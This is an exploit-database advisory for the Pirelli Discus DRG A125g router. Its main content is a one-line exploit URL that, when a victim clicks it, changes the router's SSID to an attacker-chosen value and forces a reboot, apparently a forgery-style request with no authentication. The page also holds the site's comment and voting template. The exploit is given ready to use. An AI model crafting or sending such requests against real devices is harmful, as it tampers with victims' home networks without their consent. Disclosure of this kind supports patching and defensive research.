Pirelli Discus DRG A125g Remote Change SSID Value Vulnerability

2013.11.24
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Pirelli Discus DRG A125g remote change SSID value vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 # Exploit Author: Sebastin Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) # (**) αlpha #(")(") #Exploit: http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof #info: where the parameter "wlSsid" is where the attacker will enter the new SSID. If the victim clicks on the url your modem / router will reboot automatically with the new SSID provided by the attacker.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top